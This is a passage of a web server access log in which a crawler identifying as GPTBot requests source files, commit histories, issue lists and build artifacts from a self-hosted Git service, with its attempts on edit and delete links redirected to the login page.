"https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-next-todo.md" +[17/Feb/2026:17:28:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10313] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9882] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:17:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29965] [Gzip 8.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42454] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:28:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34800] [Gzip 14.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 21023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13354] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11015] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" +[17/Feb/2026:17:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" +[17/Feb/2026:17:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11016] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" +[17/Feb/2026:17:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/ui_main.py" +[17/Feb/2026:17:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:28:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:17:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:17:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build_exe.bat" +[17/Feb/2026:17:28:31 +0000] - 200 200 - GET https 